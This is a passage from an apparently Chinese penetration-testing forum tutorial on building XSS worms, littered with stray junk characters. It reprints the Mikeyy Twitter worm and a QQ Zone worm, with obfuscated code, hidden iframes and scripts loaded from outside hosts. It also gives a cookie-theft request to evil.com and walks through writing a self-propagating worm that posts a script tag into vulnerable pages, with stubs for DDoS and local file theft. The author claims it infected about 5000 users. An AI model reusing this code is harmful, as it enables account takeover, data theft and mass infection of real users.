' g: q* F) R& B5 U1 ?</script>
* D9 r( {7 y  o2 i8 y复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>
& z9 B5 y1 Q: _+ ^8 b- f9 B9 S
7 e# z& ^8 a3 c: g/ Y: A6 bvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
9 i8 S7 K0 u7 J% }8 s( t7 t
( J, i7 j' l5 N7 q

! B! N) Z0 ~" }. `, x% V, rXmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);

3 k, u) r6 [5 ^6 M8 m* G- GXmlHttp.send(null);
$ e% X# S7 n& a1 {
<script>
复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
复制代码案例:Twitter 蠕蟲五度發威
第一版:
& @* t( g4 D- o  下载 (5.1 KB)

' `  d9 r) b: H. A$ D6 天前 08:27

! [, |* j" @, d! ?( L第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "OST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "OST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  

   2.   

   3. function XHConn(){  

& l+ E* ]5 o( W' b3 d3 A   4.   var _0x6687x2,_0x6687x3=false;  

   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  
* [* s9 e8 T; Y) T
   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  
3 w& R( V/ [  B' K! B/ m
   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  
& c1 ~0 A( z3 Y2 N" i
   8.   catch(e) { _0x6687x2=false; }; }; };  
复制代码第六版:   1. function wait() {  

   2.   var content = document.documentElement.innerHTML;  
# q0 j* [3 }) E
  L" m% q) g6 \" Y) o# b   3.   var tmp_cookie=document.cookie;  

: z9 Q) w8 \8 s& `) h- g   4.   var tmp_posted=tmp_cookie.match(/posted/);  

   5.   authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);  
. J" V; u& Q: e2 X7 K4 C2 |
4 q$ }* P3 |1 Z5 O$ f6 f8 J; D( o1 O   6.   var authtoken=authreg.exec(content);  

   7.   var authtoken=authtoken[1];  
. s& C/ x5 k* Z% U0 K
) h( K& _2 l4 L; b! c) S4 g   8.   var randomUpdate= new Array();  

   9.   randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";  
% q! t: l' L4 v% f. p& M
  v. O+ K0 p& c8 n  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  

1 J- ?% M, J# D+ _  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  
$ p6 g: G6 y8 C
  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  

  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  
, d1 }7 U- C5 F) `* `
  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp. mikeyy.";  

  15.   randomUpdate[6]= "Money is not the only thing, it's everything. Womp. mikeyy.";  

  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

  17.   randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";  
5 j+ e- Z& M& F; k% O. C
( Q% Q! |4 R& u  ]  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  

  19.   randomUpdate[10]= "'Work fascinates me' I can look at it for hours ! Womp. mikeyy.";  
1 M) u- Y& j$ w
  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  
/ @6 M4 V0 x- t) t
0 @# q9 e+ R5 ?9 L/ s# B+ k6 c  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm [url]http://bit.ly/XvuJe";  

  x) ~1 L* H7 h$ w' Y0 {  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  

  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  

1 ?8 I: G& Z4 C& d: y" w! u  24.     
) i' ?4 \7 H6 B
  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  
; B5 e2 q5 C& L- D
3 j  b0 V' c7 o* X$ [; j: |% Q3 u  26.   var updateEncode=urlencode(randomUpdate[genRand]);  

+ e) S8 [1 y! R( [& ?3 N  27.     
1 S  ]; q+ n3 k3 U& J# S
  28.   var ajaxConn= new XHConn();  

' ~& K8 h- W" W, t6 u6 q7 Q  29.   ajaxConn.connect("/status/update","OST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

  30.   var _0xf81bx1c="Mikeyy";  

/ k( _  u* M3 }0 e  31.   var updateEncode=urlencode(_0xf81bx1c);  

  32.   var ajaxConn1= new XHConn();  

8 U9 B" d2 W: V  33.   ajaxConn1.connect("/account/settings","OST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  
; G* C' N4 w% c( F
' }0 ?8 w4 I) s  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');) #test { color:#333333";  
% u: B4 s4 p. ~) k( k& p. E6 m$ v
4 y( Q4 E  R& F  k0 Q& b  35.   var XSS=urlencode(genXSS);  

  36.   var ajaxConn2= new XHConn();  

  37.   ajaxConn2.connect("/account/profile_settings",""OST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  

  38.     
. [/ c' P7 Q6 ~7 I; [- y: e: g
  39. } ;  
* y; R0 X) }$ M2 ^1 E
  40. setTimeout(wait(),5250);  
% ]  H7 T) @' W& X/ @7 v复制代码QQ空间XSSfunction killErrors() {return true;}
8 f+ m( I- r! P% S7 B3 E4 i1 Z/ ^+ k
window.onerror=killErrors;

$ G& a3 @, A# N1 v) Y( p) o

var shendu;shendu=4;

; S/ \: k/ J2 B9 J5 B//---------------global---v------------------------------------------

//通过indexOf函数得到URL中相应的字符串，用于判断是否登录的吧？

8 M8 G+ O0 a3 K8 y* Rvar visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";
) o( Z7 h2 Z# c. T
var myblogurl=new Array();var myblogid=new Array();
3 Y2 X+ w0 v6 f9 k) \5 \
        var gurl=document.location.href;

        var gurle=gurl.indexOf("com/");
$ l; F5 z5 T# N5 e
" A2 ^; s( ]% [5 a! M. T        gurl=gurl.substring(0,gurle+3);        

/ J3 Q' f0 C& X' X6 ~( X# @# _        var visitorID=top.document.documentElement.outerHTML;
3 m0 F/ A! {0 F& |
           var cookieS=visitorID.indexOf("g_iLoginUin = ");
+ h8 u! o( B) X& K; r  x! |1 d
        visitorID=visitorID.substring(cookieS+14);
7 x/ q8 t$ n/ j6 z
        cookieS=visitorID.indexOf(",");

) f3 \$ m1 W5 B( U        visitorID=visitorID.substring(0,cookieS);
* o" C& g: b$ }( E/ z( r1 B
        get_my_blog(visitorID);
0 @% W, z( z' }; w1 O3 |) Z9 q
/ @/ h$ b0 g. H/ @) C        DOshuamy();
7 A4 g# D2 Y! v5 q* A, N+ A
" Q7 G, K' |* u" F( R
2 @8 Z2 ~3 \1 E" B  S
7 K+ n* d# H/ q: l- A4 b//挂马
0 L* S, c  Z+ s8 v+ |2 a
function DOshuamy(){
  M* @8 ^, u; p6 Y. W( p
% s8 J) L! q/ Z) ?4 b/ fvar ssr=document.getElementById("veryTitle");
5 t" p5 R* t, [
" y2 q* A7 L; B: G/ m7 M9 b& xssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.xxx.com/1.html'></iframe>");

}

3 f& a4 Y+ ^  t) A0 A

" i! q1 @6 W% _* Y//如果创建XMLHttpRequest成功就跳到指定的URL去，这个URL是干什么的就不知道了，没看过，刷人气？

function get_my_blog(visitorID){
# K3 h8 f# v7 x9 ]" ?
6 c4 Z2 x# Q" i4 M" }# t7 i% S- K   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";
: r( [0 W# U: ?0 T
   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象
8 O$ J0 v! g0 b" ^" R
   if(xhr){    //成功就执行下面的

     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL

3 q( n( p, U2 w; h/ ^1 e     xhr.send();guest=xhr.responseText;
0 ]' u  P2 I# Z# w7 z, l, t( B- D" S
9 i/ H. T) D! [, ^     get_my_blogurl(guest);    //执行这个函数
7 {- ?; z' O8 o4 [
    }

}


" o' @) X/ P7 S. f
0 w- |; N! c5 e//这里似乎是判断没有登录的
( Z/ _( ]0 Q6 @. s
function get_my_blogurl(guest){

  var mybloglist=guest;

  W1 \9 s+ @' Z" ?! Z9 e( I  var myurls;var blogids;var blogide;

. H" S, F, G/ d7 ^" y# Q  for(i=0;i<shendu;i++){
$ {5 Q- f; v; h9 B
; w7 j3 T/ G( A9 G     myurls=mybloglist.indexOf('selectBlog(');    //查找URL中"selectBlog"字符串，干什么的就不知道了

7 h# c& W6 g# F5 U- X% z     if(myurls!=-1){    //找到了就执行下面的
  H* ]0 Y( e) a# ^" |5 g- w7 e1 N5 ^
: a2 F: H2 u4 _+ K         mybloglist=mybloglist.substring(myurls+11);

         myurls=mybloglist.indexOf(')');
1 A1 X- ?; j0 x$ y7 A3 A
1 r: ]0 @9 h- C         myblogid=mybloglist.substring(0,myurls);
4 X) r! Y( t2 D* q3 J4 J1 o2 U
' J+ K2 s; f- P# ?1 n6 \3 \8 M! q* J        }else{break;}

}

get_my_testself();    //执行这个函数
7 b2 H7 `' _. Y% |+ o- N
8 P1 \1 {7 `2 B6 ~}



3 D. s; ~5 Z. P4 p4 Y/ [. @//这里往哪跳就不知道了

function get_my_testself(){

  for(i=0;i<myblogid.length;i++){    //获得blogid的值
$ ^& E6 j. p, m. _" |/ t
      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();
+ ]% c* T5 m' R) N9 B
      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象

      if(xhr2){        //如果成功

              xhr2.open("GET",url,false);     //打开上面的那个url

- E( w! W. r7 [5 E" v( V              xhr2.send();
' J- L  R# x) R" f2 f
              guest2=xhr2.responseText;

. E4 O1 O9 E+ v" p! @2 w9 }              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串，找它做什么？
, x2 {8 j# c4 I7 a  ~* G
              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串
( y! P& D) f. i3 a3 X
* ^( \/ g! t# g$ H6 J5 Q( y3 a              if(mycheckmydoit!="-1"){    //返回-1则代表没找到

                targetblogurlid=myblogid;   
7 J2 [  P+ t8 ?. r5 G+ Q  {
9 D# U9 v2 t6 A5 {, r2 X                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它

) ^# V1 o% Z9 B: u9 L8 O7 U                break;

               }

8 e5 P* C9 N0 v- i+ x              if(mycheckit=="-1"){
% k% J" s; a* \, c
                targetblogurlid=myblogid;

% R" I# B3 W3 e" n" j2 F! i3 v                add_js(visitorID,targetblogurlid,gurl);    //执行它
) h2 h8 P2 {- l. p4 ^4 U
                break;
8 J2 _4 C/ ^% g& Y
               }
, S% B: g9 v- C; p" c: |1 J
        }      
. b+ {- R3 V+ G7 e; |
; S- K  T* j% s/ Y1 b}
: R& z- i1 C; X+ a
}
) O9 c# F8 B* b' [) x5 P4 K
3 K, y% o& R/ ?/ L0 C$ l+ {9 c# P3 O

# h" B7 E: f$ o6 `//--------------------------------------  
& E( m5 p9 u) J
8 ^8 r* D4 C" V) ~//根据浏览器创建一个XMLHttpRequest对象

, A% T5 h0 j, E! l6 nfunction createXMLHttpRequest(){
& R( u2 r2 s) m% q3 H
3 A' P1 L! @& \/ L( ]: V$ [5 t    var XMLhttpObject=null;  

    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
$ b* n" A2 H' M- j* g( d$ L$ g
    else  
7 y* Z, B& O- {' |, W* k
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        

        for(var i=0;i<MSXML.length;i++)  
( i* A7 n' R' w3 u& t5 `
! j5 B; J! J6 m( I8 Q( _        {  

+ A( K" [/ A, X            try  
9 j/ Y9 G2 n8 D2 r- P
/ b$ E! P% [  h: j& C            {  

0 {6 o+ m4 U2 d$ I/ r3 Z                XMLhttpObject=new ActiveXObject(MSXML);  
+ z2 C9 i/ U, F+ N; X+ p  g; g, D
1 L( c/ F) \5 d+ q                break;  

            }  
" j) _7 P, k* A, L3 U( Y
# y/ j8 \% z: b) l. x            catch (ex) {  

$ f5 X. R  e, ^            }  
. q- _% C* ]9 d- \' ?* `& T9 W
5 O! y+ T, r8 o" P1 F6 O' n         }  

  l8 ~& A/ c! r& n! U( q4 r6 }      }

7 {/ v' ~! F5 ]/ y, ^, Wreturn XMLhttpObject;

, R% N+ o. n: [/ W7 j  F2 l5 ^) L/ x0 a}  


( B  @& i7 }- r0 |) J9 A8 s
//这里就是感染部分了
) N) I1 h4 x2 s% C4 h& U2 F# ]
function add_js(visitorID,targetblogurlid,gurl){
7 ]! u2 L/ S' n3 }  L2 c1 K
, t  J3 u' |/ p* N; hvar s2=document.createElement('script');
; }% ^$ U) ]5 g* U
0 N1 l  c6 |3 Gs2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

6 j3 W: C: V, t1 z# I4 ys2.type='text/javascript';

document.getElementsByTagName('head').item(0).appendChild(s2);
4 I/ T8 h, r; d. r: s! Z1 b5 d
8 F" j( X, M  ~}



function add_jsdel(visitorID,targetblogurlid,gurl){

3 C) u' c7 ~4 r# ]( Evar s2=document.createElement('script');
6 ]# V9 i* X  L
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

s2.type='text/javascript';

document.getElementsByTagName('head').item(0).appendChild(s2);
; B. N& j! g0 _) g1 O
. r4 Q2 M; a! @0 R1 T- [}
复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)

% v; W5 S$ L+ j# f8 I" y( a2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)
& b! o% g" o( k, E0 z1 V2 x
  t- F: p1 a( d+ A- W" [9 @4 d$ v+ _/ b综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~
# w8 Q  w$ T9 V- P* W2 b' V2 w

下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.

& w8 J$ T. Y. {  ?$ b首先,自然是判断不同浏览器,创建不同的对象var request = false;

4 n; r. ~6 m/ m1 bif(window.XMLHttpRequest) {
9 N) X6 m1 S, M' f. T
) \; _0 y; B5 S8 drequest = new XMLHttpRequest();
9 x$ f5 x2 r& _$ r6 T
if(request.overrideMimeType) {

' }) `: f" B& \7 C' B+ m! }request.overrideMimeType('text/xml');

& v; o" M5 H# C. t! M}

} else if(window.ActiveXObject) {

" W: U/ s$ D3 ?4 w* L! {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
* p/ \3 t2 p! o  i  e
for(var i=0; i<versions.length; i++) {

3 _3 n- d( l) W$ X5 Z6 otry {

request = new ActiveXObject(versions);
9 I* R3 w7 W+ w/ O$ _
- E+ P3 v4 Q% ^+ C) Y5 F} catch(e) {}
: q3 g  t1 m+ z
}
6 ^" o' `) _) a8 z1 c
}

xmlHttpReq=request;
. S, f5 B9 R$ Q6 j, @复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){

% Z0 G7 G6 f6 X: t/ M6 C; S        var Browser_Name=navigator.appName;

, l1 B8 w) w. Z3 ~1 ?5 p        var Browser_Version=parseFloat(navigator.appVersion);

        var Browser_Agent=navigator.userAgent;
* |1 ~9 Q% b) S* y$ d
        
" q. B/ w$ P4 t
& X6 a6 ^( y7 G- `! p        var Actual_Version,Actual_Name;

8 m# O5 }. L0 f        

- N' x% `0 P0 g7 ?2 R        var is_IE=(Browser_Name=="Microsoft Internet Explorer");
) r- {* `  \  h
: a+ r9 [0 _0 g7 _2 G( B* X        var is_NN=(Browser_Name=="Netscape");
$ u. @3 l+ o2 X/ p3 O+ N
        var is_Ch=(Browser_Name=="Chrome");

* [& M7 X" S9 b/ z$ i        

8 H  H9 ^. N6 I& n        if(is_NN){

            if(Browser_Version>=5.0){

. f: P2 k6 g/ I! M                var Split_Sign=Browser_Agent.lastIndexOf("/");
+ @3 n5 R) n: X' L
                var Version=Browser_Agent.indexOf(" ",Split_Sign);

% G& O6 q7 A! B% T                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);
' {# G4 `( ^" x' I3 D! G, A0 F
. \% K: z4 K9 E. I7 `: |

+ n' }' }- u. k* b# C                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);

, ]( @/ I* A8 k! g# b, P                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);

            }
: F3 v3 ]& [  I5 k% _, t* T+ g* ^
3 a/ P0 i' O8 R5 h            else{
8 D! {; g6 C" B2 k: k6 |
                Actual_Version=Browser_Version;
, |1 X% l, ]4 w4 Z4 ]
( q- F, q: s. F/ F* G                Actual_Name=Browser_Name;
  ~" G& M7 h4 d% W2 h$ F' l  q* J( x
            }

        }
/ x; R! q1 s0 q' _
  p% O' L8 n2 W) n  I* O        else if(is_IE){

. X+ \% @( a+ r! Q7 I* `6 }; w            var Version_Start=Browser_Agent.indexOf("MSIE");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);
- y8 X9 x* ]/ k3 Y
            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

- Q7 G, r, j9 T$ W6 l            Actual_Name=Browser_Name;

* B. a* D$ N: h/ Z6 `9 O5 Z            

% {3 @- O0 [. ^+ ^+ k# ^, W  l            if(Browser_Agent.indexOf("Maxthon")!=-1){

                Actual_Name+="(Maxthon)";

  O0 t' y) d2 z, _8 l3 e5 J            }
3 w  t; K4 w) ]
/ z: j. q& |6 @. Y: k            else if(Browser_Agent.indexOf("Opera")!=-1){

  D; f, O& A0 k# t+ o0 U                Actual_Name="Opera";

                var tempstart=Browser_Agent.indexOf("Opera");

6 B& Z. W; v6 L9 c                var tempend=Browser_Agent.length;

6 c; s/ n$ X9 H+ W* e& ^1 g                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
7 K( \( {4 m/ K7 w4 Y$ S
            }

        }

! O( S$ N/ `! E0 a* w        else if(is_Ch){

            var Version_Start=Browser_Agent.indexOf("Chrome");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);

            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
3 e5 c3 {- r  m6 e
            Actual_Name=Browser_Name;
! o  l5 ?; M: ^9 w
" i3 W7 A- V3 O( P5 f% w* p            

            if(Browser_Agent.indexOf("Maxthon")!=-1){
; Q/ r9 W4 e: W) q
                Actual_Name+="(Maxthon)";

* d) t, ]+ l0 U8 I            }
  V# ~' q* ^' b2 S' ~
            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";
, W! }8 W/ H* p3 w! b1 s
                var tempstart=Browser_Agent.indexOf("Opera");

; W: U2 s! N; {7 }                var tempend=Browser_Agent.length;
7 d+ F  S! {2 ^4 a* @! ^- `$ K# C5 Q
( C- J+ `. R& q5 M' ?                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
2 B6 G2 F/ ^6 `, j# ~$ o
. B! M/ |0 Y! r: V/ p            }

        }
; T2 `' b* S/ W, u( u
        else{
6 ~% ~* i7 d5 w
            Actual_Name="Unknown Navigator"
2 Z- c- b# h  i* [
            Actual_Version="Unknown Version"
& z1 }. M# I9 r& L8 e
1 P: F9 c- ]/ X" |# \$ a1 l        }

+ u: Y6 T: o/ ^( T# c

        navigator.Actual_Name=Actual_Name;
6 E$ x$ r! D' _: a0 N5 Y+ G
        navigator.Actual_Version=Actual_Version;
( {5 ?& @" Y, Q4 t6 a; ?) h7 H
( t" Z6 R* U+ a0 i! [  c2 O# D1 P' ]        
, `$ v1 ]: g) q: s
% s2 n1 n# ?- j7 {3 ~1 C        this.Name=Actual_Name;

0 ]# A, u$ b" u1 ]1 K6 a8 T& A        this.Version=Actual_Version;
$ b0 b8 D5 ]6 _9 a1 G4 N
* x( u, ^- |7 s    }
$ b& x- ?0 Z4 V& W
    browserinfo();
+ g9 @/ I- y& R+ L7 Z* G
, J5 b2 N* K  G: `' D" {    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}
: X# f7 D2 Q0 G+ F
. l6 j0 h2 L7 W" o" ?* R) I    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}

% K: t0 A/ o9 n% P* u* h# J    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}
) p6 t) ?( C5 t! t1 S- v# f2 p: T5 H
/ j2 f. P9 \% U/ T5 H    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
. ~( d  ~# @- ^1 [0 b复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.

xmlHttpReq.send(null);
# z  B/ I7 h8 ]" \' J: R& A/ s3 N
var resource = xmlHttpReq.responseText;
* ?* W3 _. O' E% [" d7 ]6 {' ~# r
) B! C' _6 P9 ]* e7 e- b' i" n* Lvar id=0;var result;
7 E! ^/ w; R7 ]1 V! X2 P
. T: y; h1 k  p% nvar patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.
3 J7 `' n5 d% H+ ?
- J5 V5 V/ `9 `) D2 g/ X  Ewhile ((result = patt.exec(resource)) != null)  {
& p- X. f7 ]3 A& g5 s  w# ^( k
$ {- Y7 w5 Y5 ^$ a) S' Sid++;

}
, }4 R8 O* S: v% \$ M( x7 [复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.
9 k% }7 S2 Y# x& g) y
no=resource.search(/my name is/);

var wd='<script src="http://www.evil.com/bugbug.js"</script>';        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.
+ g9 i% y8 S: @8 i9 T, a
, L$ i$ }0 ]: F8 m( {4 |var post="wd="+wd;

xmlHttpReq.open("OST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.

xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

1 g" C8 H  U% o% K- s7 l$ V6 rxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

xmlHttpReq.send(post);
: Z: w, ?2 T- R" I3 |
}
复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{

: Q8 G2 n" ^# B1 p7 S9 ovar no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方
. }% D) k/ f8 c& y7 B* M
var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.

0 }/ r7 I7 l/ }; Y3 U$ Bvar wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.
) f. ?( `' W8 E& i; [; C' c3 b* V* M4 W
var post="wd="+wd;
9 _& q! o+ C6 V! G0 R1 s
xmlHttpReq.open("OST","http://vul.com/vul.jsp",false);
! G6 j! P; x" Z
2 k+ Q# n. \% N- L& M" a6 {8 E: qxmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);
8 |9 g  L& x- x6 J6 N$ g* m
2 G/ S& w- r$ d/ kxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

+ B9 P6 L) r, r% rxmlHttpReq.send(post);                 //把传播的信息 POST出去.

8 H7 M, j! H2 v6 r8 D}
复制代码-----------------------------------------------------总结-------------------------------------------------------------------
$ w2 `7 `7 g# d; V" |3 A- c
/ Y" E) e: K' v: J' z
4 K5 i/ U6 z) s2 G; T2 N3 H
7 I- w! M; T& e9 H本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
6 S! l8 v) l! s2 J0 d蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
- E, c4 M) r# z1 u) u" b  _) K* I操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.


" x/ I; l" ]7 T4 K" n/ G; Z  }+ i3 i
2 o& n/ ?1 ^3 [8 `




本文引用文档资料:
$ F- M1 _* Z0 Q, D9 C! ^. i# `
! E7 V: c, t# k# x; G1 X"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
! h" t+ \4 K' U. f/ a9 ~0 ]Other XmlHttpRequest tricks (Amit Klein, January 2003)
0 t) z( K4 d' @: c4 l- r9 r"Cross Site Tracing" (Jeremiah Grossman, January 2003)
- @1 y' s& G# l1 _. A8 i9 qhttp://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
5 i9 f* ]" V; A. `. s3 t空虚浪子心BLOG http://www.inbreak.net
/ i; g. W; w  t6 IXeye Team http://xeye.us/
9 E0 A/ a* K  s% X5 U

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2